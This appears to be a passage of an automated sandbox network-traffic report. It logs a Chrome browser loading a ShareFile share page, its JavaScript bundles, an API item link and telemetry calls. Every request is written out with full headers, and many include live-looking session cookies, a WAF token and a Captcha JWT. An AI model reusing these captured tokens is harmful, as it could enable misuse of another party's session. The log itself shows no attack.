AWSALBTGCORS=4zl+EiXJ5sM86gL4YwGp+MbmtrzFp18R8EhwGIMzv1sPfkyy0agMRHuEC5/2BsJk/OTmxdhxB26Pe1SFHJ3b0jiNr+cAAdcqK3379B1jNPZt4Sxm/WrUYxiOvDKblapj6kQcW3I49NMmJOagbLc+S5xteJyn+XXaI+ilt3LHk8GcP/7U2hrWk9UPF83BwdA9ehlSckM23krRxE6M7fPepNsD1o0CWEOknSQIcoUvjXSyAzduiJwDQua07iqSwiuJ; AWSALB=shNjqC6UiheGcaO1zs5+iqxoHSRVHYghqAJlyxr6yYyWP3q9X3HZ0fgBaEhoD6PSExGOaUU1K8HPg3QP6uIi7LHXX6IKn7ZpqLKZSVx/UbU27gsbHhJpbcDI6Mjv; AWSALBCORS=shNjqC6UiheGcaO1zs5+iqxoHSRVHYghqAJlyxr6yYyWP3q9X3HZ0fgBaEhoD6PSExGOaUU1K8HPg3QP6uIi7LHXX6IKn7ZpqLKZSVx/UbU27gsbHhJpbcDI6Mjv
Source: global trafficHTTP traffic detected: GET /bundles/22a601d65471e8503ea9.js HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://averellharriman.sharefile.com/share/view/s3b96c17360cd43e7bdcaf25a23709fd0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAaZmJtjsOAAAA:xkRlisV0689T1jmvmwxmHz1sL5bM9WuSH+rXjwIhYR6qWw8NOhKgLCAPwLqt3fSbjbgzgiuAzKyX+7tSjbgWy24fIVvWGKKVog/+rLdDfPIayaMdLeaL6NEQuqyWfw/X+DnrbYz2hDGC1qgD5K5iPzaEZItkrAqmwwXiRdNnu7sXB9o3SJvUp3LqL1wYSgbzBvTAdqCN7z9gMzoyf8kueXXkIR64a3F4jv5RXcYMHWZnKKDQIuWzdON6LYN/BO2IFkI/BfWa; AWSALBTG=4zl+EiXJ5sM86gL4YwGp+MbmtrzFp18R8EhwGIMzv1sPfkyy0agMRHuEC5/2BsJk/OTmxdhxB26Pe1SFHJ3b0jiNr+cAAdcqK3379B1jNPZt4Sxm/WrUYxiOvDKblapj6kQcW3I49NMmJOagbLc+S5xteJyn+XXaI+ilt3LHk8GcP/7U2hrWk9UPF83BwdA9ehlSckM23krRxE6M7fPepNsD1o0CWEOknSQIcoUvjXSyAzduiJwDQua07iqSwiuJ; AWSALBTGCORS=4zl+EiXJ5sM86gL4YwGp+MbmtrzFp18R8EhwGIMzv1sPfkyy0agMRHuEC5/2BsJk/OTmxdhxB26Pe1SFHJ3b0jiNr+cAAdcqK3379B1jNPZt4Sxm/WrUYxiOvDKblapj6kQcW3I49NMmJOagbLc+S5xteJyn+XXaI+ilt3LHk8GcP/7U2hrWk9UPF83BwdA9ehlSckM23krRxE6M7fPepNsD1o0CWEOknSQIcoUvjXSyAzduiJwDQua07iqSwiuJ; AWSALB=shNjqC6UiheGcaO1zs5+iqxoHSRVHYghqAJlyxr6yYyWP3q9X3HZ0fgBaEhoD6PSExGOaUU1K8HPg3QP6uIi7LHXX6IKn7ZpqLKZSVx/UbU27gsbHhJpbcDI6Mjv; AWSALBCORS=shNjqC6UiheGcaO1zs5+iqxoHSRVHYghqAJlyxr6yYyWP3q9X3HZ0fgBaEhoD6PSExGOaUU1K8HPg3QP6uIi7LHXX6IKn7ZpqLKZSVx/UbU27gsbHhJpbcDI6Mjv
Source: global trafficHTTP traffic detected: GET /events/1/fd14b65b5e?a=594432325&sa=1&v=1216.487a282&t=Unnamed%20Transaction&rst=40206&ck=1&ref=https://averellharriman.sharefile.com/share/view/s3b96c17360cd43e7bdcaf25a23709fd0 HTTP/1.1Host: bam.nr-data.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: JSESSIONID=e768e1339f16edbe
Source: global trafficHTTP traffic detected: GET /bundles/2efeefafc2bb68a97d33.js HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAaZmJtjsOAAAA:xkRlisV0689T1jmvmwxmHz1sL5bM9WuSH+rXjwIhYR6qWw8NOhKgLCAPwLqt3fSbjbgzgiuAzKyX+7tSjbgWy24fIVvWGKKVog/+rLdDfPIayaMdLeaL6NEQuqyWfw/X+DnrbYz2hDGC1qgD5K5iPzaEZItkrAqmwwXiRdNnu7sXB9o3SJvUp3LqL1wYSgbzBvTAdqCN7z9gMzoyf8kueXXkIR64a3F4jv5RXcYMHWZnKKDQIuWzdON6LYN/BO2IFkI/BfWa; AWSALBTG=7ViCLDPrhRxpo4VhM+NgwwU/vbMeVggOKs4jGi/z0fEzl7TMyqaxUrziaZABV7bLva8CZ+qbo5XsTKe7zwypNTck4Sjg4aMuBoflTWMm3hVwzYiYtAn/t9Fsu+tPrh5Psy6blR6SLGhvgTrfPjmgaunaNKtisYZik8PEiYW6saFodyV0kRJ2aSIAwgLYWGh++2JI02w9WCzf/6QbBW9rWRAwJNm13sgTnIFafJOfA/2Oen9xl8MNEmIY+Urt2RGl; AWSALBTGCORS=7ViCLDPrhRxpo4VhM+NgwwU/vbMeVggOKs4jGi/z0fEzl7TMyqaxUrziaZABV7bLva8CZ+qbo5XsTKe7zwypNTck4Sjg4aMuBoflTWMm3hVwzYiYtAn/t9Fsu+tPrh5Psy6blR6SLGhvgTrfPjmgaunaNKtisYZik8PEiYW6saFodyV0kRJ2aSIAwgLYWGh++2JI02w9WCzf/6QbBW9rWRAwJNm13sgTnIFafJOfA/2Oen9xl8MNEmIY+Urt2RGl; AWSALB=Ql/Iz3FunSWu5Y4nww11wQgG+toQ9Av8A0wwo6Q5Pdlt/8ONEVPWYPrZqYTU7MfYbroi1uuim+srh4qJkvQQpPDk0s7y5rH6tAtkKkqSRvOJ6c9d2YDxqGAuvieG; AWSALBCORS=Ql/Iz3FunSWu5Y4nww11wQgG+toQ9Av8A0wwo6Q5Pdlt/8ONEVPWYPrZqYTU7MfYbroi1uuim+srh4qJkvQQpPDk0s7y5rH6tAtkKkqSRvOJ6c9d2YDxqGAuvieG
Source: global trafficHTTP traffic detected: GET /bundles/d178f6eceb0126b1e292.js HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAaZmJtjsOAAAA:xkRlisV0689T1jmvmwxmHz1sL5bM9WuSH+rXjwIhYR6qWw8NOhKgLCAPwLqt3fSbjbgzgiuAzKyX+7tSjbgWy24fIVvWGKKVog/+rLdDfPIayaMdLeaL6NEQuqyWfw/X+DnrbYz2hDGC1qgD5K5iPzaEZItkrAqmwwXiRdNnu7sXB9o3SJvUp3LqL1wYSgbzBvTAdqCN7z9gMzoyf8kueXXkIR64a3F4jv5RXcYMHWZnKKDQIuWzdON6LYN/BO2IFkI/BfWa; AWSALBTG=z8cMYZejOlBADA4mJFhgQBqbq0zpXF/5XXH/IsVsVVpJEOcdt/MjvSDTi0JyHNJ/AQrYv/gLfbNJ81oaJCkQ3ErJAP4ACZp6CLcU/ISGMKqdif/Vvn/G1iWd2mG8yOC33SuaCQHdTCnqo/y5KE+Fjte84VRKdm0f5McSi1B10wl3Aaff2UCqu36skeA/f1oNK8JaEfIm1FFWmNN+hJ1Vn1xc/HqMZHDc5nFgidZe9gCzYa8qYakZkAEkTIlKEIIv; AWSALBTGCORS=z8cMYZejOlBADA4mJFhgQBqbq0zpXF/5XXH/IsVsVVpJEOcdt/MjvSDTi0JyHNJ/AQrYv/gLfbNJ81oaJCkQ3ErJAP4ACZp6CLcU/ISGMKqdif/Vvn/G1iWd2mG8yOC33SuaCQHdTCnqo/y5KE+Fjte84VRKdm0f5McSi1B10wl3Aaff2UCqu36skeA/f1oNK8JaEfIm1FFWmNN+hJ1Vn1xc/HqMZHDc5nFgidZe9gCzYa8qYakZkAEkTIlKEIIv; AWSALB=H3reDjRzDL9IbFGUHHEey8DoX+peOn9NuXQjwHa5hIrpqXWa3/APFTZnPaFps7UTgSSZXiXnkvs/qWWkVQ2YwQ8c+yvqN7fLi5qATwFM6fAqfWRBk/W9ssjcH2s7; AWSALBCORS=H3reDjRzDL9IbFGUHHEey8DoX+peOn9NuXQjwHa5hIrpqXWa3/APFTZnPaFps7UTgSSZXiXnkvs/qWWkVQ2YwQ8c+yvqN7fLi5qATwFM6fAqfWRBk/W9ssjcH2s7
Source: global trafficHTTP traffic detected: GET /bundles/22a601d65471e8503ea9.js HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAaZmJtjsOAAAA:xkRlisV0689T1jmvmwxmHz1sL5bM9WuSH+rXjwIhYR6qWw8NOhKgLCAPwLqt3fSbjbgzgiuAzKyX+7tSjbgWy24fIVvWGKKVog/+rLdDfPIayaMdLeaL6NEQuqyWfw/X+DnrbYz2hDGC1qgD5K5iPzaEZItkrAqmwwXiRdNnu7sXB9o3SJvUp3LqL1wYSgbzBvTAdqCN7z9gMzoyf8kueXXkIR64a3F4jv5RXcYMHWZnKKDQIuWzdON6LYN/BO2IFkI/BfWa; AWSALBTG=a94KgxsGzR7+K8MIXQttBTJsTg6/vTQwi08AGXmCLhs+I95aoeS6FJzCcN78iW6kIHTpFT7KYCn4cLf7P5x8xxviKdRSYZ1AhtNre5YEozlrHUVwAWflpBzFAXPs1mUnYCjaYkQ8yByJMO6B4hTfNofkwDQCSVhP+K/wKAk2ylrPJK2OkxXTAmD9/mul5WwE7kdux6WoAx6tO7ILPGONTSDqL+tiBsI3X4q/BK5VTpPmiMccrOU9YNeMYIeNABX1; AWSALBTGCORS=a94KgxsGzR7+K8MIXQttBTJsTg6/vTQwi08AGXmCLhs+I95aoeS6FJzCcN78iW6kIHTpFT7KYCn4cLf7P5x8xxviKdRSYZ1AhtNre5YEozlrHUVwAWflpBzFAXPs1mUnYCjaYkQ8yByJMO6B4hTfNofkwDQCSVhP+K/wKAk2ylrPJK2OkxXTAmD9/mul5WwE7kdux6WoAx6tO7ILPGONTSDqL+tiBsI3X4q/BK5VTpPmiMccrOU9YNeMYIeNABX1; AWSALB=av7Qs3deAFpRLnRyfW7oVMFNyZlKx0HZFOdorhLqwdmDF5oQYjcq3veqokN6qw0FsX60Np2KW/jtA385zZ2isewgBuLdb08+Ie/lFcwlsqCN1Zw3wxvby7b8BtkP; AWSALBCORS=av7Qs3deAFpRLnRyfW7oVMFNyZlKx0HZFOdorhLqwdmDF5oQYjcq3veqokN6qw0FsX60Np2KW/jtA385zZ2isewgBuLdb08+Ie/lFcwlsqCN1Zw3wxvby7b8BtkP
Source: global trafficHTTP traffic detected: GET /bundles/b5bef5c91ec3b83469e0.js HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAaZmJtjsOAAAA:xkRlisV0689T1jmvmwxmHz1sL5bM9WuSH+rXjwIhYR6qWw8NOhKgLCAPwLqt3fSbjbgzgiuAzKyX+7tSjbgWy24fIVvWGKKVog/+rLdDfPIayaMdLeaL6NEQuqyWfw/X+DnrbYz2hDGC1qgD5K5iPzaEZItkrAqmwwXiRdNnu7sXB9o3SJvUp3LqL1wYSgbzBvTAdqCN7z9gMzoyf8kueXXkIR64a3F4jv5RXcYMHWZnKKDQIuWzdON6LYN/BO2IFkI/BfWa; AWSALBTG=a94KgxsGzR7+K8MIXQttBTJsTg6/vTQwi08AGXmCLhs+I95aoeS6FJzCcN78iW6kIHTpFT7KYCn4cLf7P5x8xxviKdRSYZ1AhtNre5YEozlrHUVwAWflpBzFAXPs1mUnYCjaYkQ8yByJMO6B4hTfNofkwDQCSVhP+K/wKAk2ylrPJK2OkxXTAmD9/mul5WwE7kdux6WoAx6tO7ILPGONTSDqL+tiBsI3X4q/BK5VTpPmiMccrOU9YNeMYIeNABX1; AWSALBTGCORS=a94KgxsGzR7+K8MIXQttBTJsTg6/vTQwi08AGXmCLhs+I95aoeS6FJzCcN78iW6kIHTpFT7KYCn4cLf7P5x8xxviKdRSYZ1AhtNre5YEozlrHUVwAWflpBzFAXPs1mUnYCjaYkQ8yByJMO6B4hTfNofkwDQCSVhP+K/wKAk2ylrPJK2OkxXTAmD9/mul5WwE7kdux6WoAx6tO7ILPGONTSDqL+tiBsI3X4q/BK5VTpPmiMccrOU9YNeMYIeNABX1; AWSALB=av7Qs3deAFpRLnRyfW7oVMFNyZlKx0HZFOdorhLqwdmDF5oQYjcq3veqokN6qw0FsX60Np2KW/jtA385zZ2isewgBuLdb08+Ie/lFcwlsqCN1Zw3wxvby7b8BtkP; AWSALBCORS=av7Qs3deAFpRLnRyfW7oVMFNyZlKx0HZFOdorhLqwdmDF5oQYjcq3veqokN6qw0FsX60Np2KW/jtA385zZ2isewgBuLdb08+Ie/lFcwlsqCN1Zw3wxvby7b8BtkP
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-dynamic-forms-pilet/1.39.0/package/dist/d8fcf3851ba79b1d138a.woff2 HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://averellharriman.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-dynamic-forms-pilet/1.39.0/package/dist/main.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sf/v3/Shares(s3b96c17360cd43e7bdcaf25a23709fd0)/Items(stc239a0-b110-4a4c-8267-41d8a0de3bab)/ProtocolLinks(Web)?action=View HTTP/1.1Host: averellharriman.sf-api.comConnection: keep-aliveCorrelationId: p1vfn7S6BDJ0690mu4ukOAsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept-Language: ensec-ch-ua-mobile: ?0Authorization: Captcha eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJTdGF0ZSI6InMzYjk2YzE3MzYwY2Q0M2U3YmRjYWYyNWEyMzcwOWZkMCIsIkV4cGlyZXMiOjE3MzA4MzcxOTJ9.wTd-fIjFO8_GgBbOwguJGQ4qxSnkx6LEIZGymUqSPnAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36X-SF-ClientCapabilities: HardLock,HardQuota,AthenaSSOAccept: application/json, text/plain, */*X-SF-App: ShareFileWebsec-ch-ua-platform: "Windows"Origin: https://averellharriman.sharefile.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brCookie: AWSALBTGCORS=qj9lD9BAng1il+UyeG2FfQIrO8bqAw4p3kwhI7s2lGq8iQHSb51UINx8yoAnQnGaCiPM0962bmFrSHnpdneQ2sOwubWRUr9/aw2aj5YAu6HTN38//LZ9eNRDID1RWTnCT2hu2/1zvPH5vKZ79M1MvwRjeJcnc+l1FhnfJ4VdAvFv; AWSALBCORS=WoGB1y0d3EoqVHkCmKSdpeH+WhEU7F4AnPXyGAMFrZGSMxbLJk3bU9Rnk8i33z1H7MPvZkxfeDZwiHCEKhvE7bfcLAC05dr8m0iv9a5vRIMS4edoTAwHuQUouxmi
Source: global trafficHTTP traffic detected: GET /bundles/2c61db7618456a4b4ea2.js HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://averellharriman.sharefile.com/share/view/s3b96c17360cd43e7bdcaf25a23709fd0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAaZmJtjsOAAAA:xkRlisV0689T1jmvmwxmHz1sL5bM9WuSH+rXjwIhYR6qWw8NOhKgLCAPwLqt3fSbjbgzgiuAzKyX+7tSjbgWy24fIVvWGKKVog/+rLdDfPIayaMdLeaL6NEQuqyWfw/X+DnrbYz2hDGC1qgD5K5iPzaEZItkrAqmwwXiRdNnu7sXB9o3SJvUp3LqL1wYSgbzBvTAdqCN7z9gMzoyf8kueXXkIR64a3F4jv5RXcYMHWZnKKDQIuWzdON6LYN/BO2IFkI/BfWa; AWSALBTG=CXe69sCbz8r4rhPzyocHw/hbUJ2MbCam+4RASz1SwVfiTKgqPCsnftKw2Gu40Epl2ecC0FXPRPenJu9x+Mi/Uxn+ZMQeOIqu1V6W4T2dvc2vcGsCzB1eRTXOdj0MQDSGYPhHcFdl2uidzASxnJr/9ZL5IeLH2TC2v7Bq2WKhMovAKj91XLnE3kFQPXzCqmDIMUEDdZI3WGiRnavpexD+ixYxeUV7uLwO0BcfSV6XX98/Bn5NqzC56p36KNLP6qJ7; AWSALBTGCORS=CXe69sCbz8r4rhPzyocHw/hbUJ2MbCam+4RASz1SwVfiTKgqPCsnftKw2Gu40Epl2ecC0FXPRPenJu9x+Mi/Uxn+ZMQeOIqu1V6W4T2dvc2vcGsCzB1eRTXOdj0MQDSGYPhHcFdl2uidzASxnJr/9ZL5IeLH2TC2v7Bq2WKhMovAKj91XLnE3kFQPXzCqmDIMUEDdZI3WGiRnavpexD+ixYxeUV7uLwO0BcfSV6XX98/Bn5NqzC56p36KNLP6qJ7; AWSALB=PiZJJPHIf6floOeE0yH7k3MOwFLN0p0cThshcenGkq3H/M+cFQj4KRIU16wId/Zhm6ObFIm0TdgsERNAnKaSmsXXmxeq1roJ0HwMgEPo7xyqk8Lad5jn6AHCbl6v; AWSALBCORS=PiZJJPHIf6floOeE0yH7k3MOwFLN0p0cThshcenGkq3H/M+cFQj4KRIU16wId/Zhm6ObFIm0TdgsERNAnKaSmsXXmxeq1roJ0HwMgEPo7xyqk8Lad5jn6AHCbl6v
Source: global trafficHTTP traffic detected: GET /sf/v3/Shares(s3b96c17360cd43e7bdcaf25a23709fd0)/Items(stc239a0-b110-4a4c-8267-41d8a0de3bab)/ProtocolLinks(Web)?action=View HTTP/1.1Host: averellharriman.sf-api.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AWSALBTG=qj9lD9BAng1il+UyeG2FfQIrO8bqAw4p3kwhI7s2lGq8iQHSb51UINx8yoAnQnGaCiPM0962bmFrSHnpdneQ2sOwubWRUr9/aw2aj5YAu6HTN38//LZ9eNRDID1RWTnCT2hu2/1zvPH5vKZ79M1MvwRjeJcnc+l1FhnfJ4VdAvFv; AWSALB=WoGB1y0d3EoqVHkCmKSdpeH+WhEU7F4AnPXyGAMFrZGSMxbLJk3bU9Rnk8i33z1H7MPvZkxfeDZwiHCEKhvE7bfcLAC05dr8m0iv9a5vRIMS4edoTAwHuQUouxmi; AWSALBTGCORS=oWODkElH2b6ZauvcP74xdpwTQA9QqESgdGvYvkBt1Wp7s8BaLiyKpj61Qavlc+1ZVvj41ROEbInQV1u8EdKewyPk0AQf6FpcSUQxCwtSUjMbqScOnlvf3nOyK+vqqtjV7Ta61eAnAUYXtjnQPoSvZb48rXZ4BIHwj47ZJM2WTILv; AWSALBCORS=NNPACNRJxraFUejVp/UvmH3A/warl0VIUNywLqkEVuWYVJ15MLue9zd7E6kInQfyAb34vOfxzAZwhZIW5Q4ETSHnUjYiWrazE6bghi78vRrOEwfU3amRwtS2mYKE
Source: global trafficHTTP traffic detected: GET /bundles/d5a7899d41651404accd.js HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://averellharriman.sharefile.com/share/view/s3b96c17360cd43e7bdcaf25a23709fd0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAaZmJtjsOAAAA:xkRlisV0689T1jmvmwxmHz1sL5bM9WuSH+rXjwIhYR6qWw8NOhKgLCAPwLqt3fSbjbgzgiuAzKyX+7tSjbgWy24fIVvWGKKVog/+rLdDfPIayaMdLeaL6NEQuqyWfw/X+DnrbYz2hDGC1qgD5K5iPzaEZItkrAqmwwXiRdNnu7sXB9o3SJvUp3LqL1wYSgbzBvTAdqCN7z9gMzoyf8kueXXkIR64a3F4jv5RXcYMHWZnKKDQIuWzdON6LYN/BO2IFkI/BfWa; AWSALBTG=CXe69sCbz8r4rhPzyocHw/hbUJ2MbCam+4RASz1SwVfiTKgqPCsnftKw2Gu40Epl2ecC0FXPRPenJu9x+Mi/Uxn+ZMQeOIqu1V6W4T2dvc2vcGsCzB1eRTXOdj0MQDSGYPhHcFdl2uidzASxnJr/9ZL5IeLH2TC2v7Bq2WKhMovAKj91XLnE3kFQPXzCqmDIMUEDdZI3WGiRnavpexD+ixYxeUV7uLwO0BcfSV6XX98/Bn5NqzC56p36KNLP6qJ7; AWSALBTGCORS=CXe69sCbz8r4rhPzyocHw/hbUJ2MbCam+4RASz1SwVfiTKgqPCsnftKw2Gu40Epl2ecC0FXPRPenJu9x+Mi/Uxn+ZMQeOIqu1V6W4T2dvc2vcGsCzB1eRTXOdj0MQDSGYPhHcFdl2uidzASxnJr/9ZL5IeLH2TC2v7Bq2WKhMovAKj91XLnE3kFQPXzCqmDIMUEDdZI3WGiRnavpexD+ixYxeUV7uLwO0BcfSV6XX98/Bn5NqzC56p36KNLP6qJ7; AWSALB=PiZJJPHIf6floOeE0yH7k3MOwFLN0p0cThshcenGkq3H/M+cFQj4KRIU16wId/Zhm6ObFIm0TdgsERNAnKaSmsXXmxeq1roJ0HwMgEPo7xyqk8Lad5jn6AHCbl6v; AWSALBCORS=PiZJJPHIf6floOeE0yH7k3MOwFLN0p0cThshcenGkq3H/M+cFQj4KRIU16wId/Zhm6ObFIm0TdgsERNAnKaSmsXXmxeq1roJ0HwMgEPo7xyqk8Lad5jn6AHCbl6v
Source: global trafficHTTP traffic detected: GET /bundles/c5f4a641bb6587c3f44f.js HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://averellharriman.sharefile.com/share/view/s3b96c17360cd43e7bdcaf25a23709fd0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAaZmJtjsOAAAA:xkRlisV0689T1jmvmwxmHz1sL5bM9WuSH+rXjwIhYR6qWw8NOhKgLCAPwLqt3fSbjbgzgiuAzKyX+7tSjbgWy24fIVvWGKKVog/+rLdDfPIayaMdLeaL6NEQuqyWfw/X+DnrbYz2hDGC1qgD5K5iPzaEZItkrAqmwwXiRdNnu7sXB9o3SJvUp3LqL1wYSgbzBvTAdqCN7z9gMzoyf8kueXXkIR64a3F4jv5RXcYMHWZnKKDQIuWzdON6LYN/BO2IFkI/BfWa; AWSALBTG=CXe69sCbz8r4rhPzyocHw/hbUJ2MbCam+4RASz1SwVfiTKgqPCsnftKw2Gu40Epl2ecC0FXPRPenJu9x+Mi/Uxn+ZMQeOIqu1V6W4T2dvc2vcGsCzB1eRTXOdj0MQDSGYPhHcFdl2uidzASxnJr/9ZL5IeLH2TC2v7Bq2WKhMovAKj91XLnE3kFQPXzCqmDIMUEDdZI3WGiRnavpexD+ixYxeUV7uLwO0BcfSV6XX98/Bn5NqzC56p36KNLP6qJ7; AWSALBTGCORS=CXe69sCbz8r4rhPzyocHw/hbUJ2MbCam+4RASz1SwVfiTKgqPCsnftKw2Gu40Epl2ecC0FXPRPenJu9x+Mi/Uxn+ZMQeOIqu1V6W4T2dvc2vcGsCzB1eRTXOdj0MQDSGYPhHcFdl2uidzASxnJr/9ZL5IeLH2TC2v7Bq2WKhMovAKj91XLnE3kFQPXzCqmDIMUEDdZI3WGiRnavpexD+ixYxeUV7uLwO0BcfSV6XX98/Bn5NqzC56p36KNLP6qJ7; AWSALB=PiZJJPHIf6floOeE0yH7k3MOwFLN0p0cThshcenGkq3H/M+cFQj4KRIU16wId/Zhm6ObFIm0TdgsERNAnKaSmsXXmxeq1roJ0HwMgEPo7xyqk8Lad5jn6AHCbl6v; AWSALBCORS=PiZJJPHIf6floOeE0yH7k3MOwFLN0p0cThshcenGkq3H/M+cFQj4KRIU16wId/Zhm6ObFIm0TdgsERNAnKaSmsXXmxeq1roJ0HwMgEPo7xyqk8Lad5jn6AHCbl6v
Source: global trafficHTTP traffic detected: GET /bundles/5626aad50bfaf67fedc0.js HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://averellharriman.sharefile.com/share/view/s3b96c17360cd43e7bdcaf25a23709fd0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAaZmJtjsOAAAA:xkRlisV0689T1jmvmwxmHz1sL5bM9WuSH+rXjwIhYR6qWw8NOhKgLCAPwLqt3fSbjbgzgiuAzKyX+7tSjbgWy24fIVvWGKKVog/+rLdDfPIayaMdLeaL6NEQuqyWfw/X+DnrbYz2hDGC1qgD5K5iPzaEZItkrAqmwwXiRdNnu7sXB9o3SJvUp3LqL1wYSgbzBvTAdqCN7z9gMzoyf8kueXXkIR64a3F4jv5RXcYMHWZnKKDQIuWzdON6LYN/BO2IFkI/BfWa; 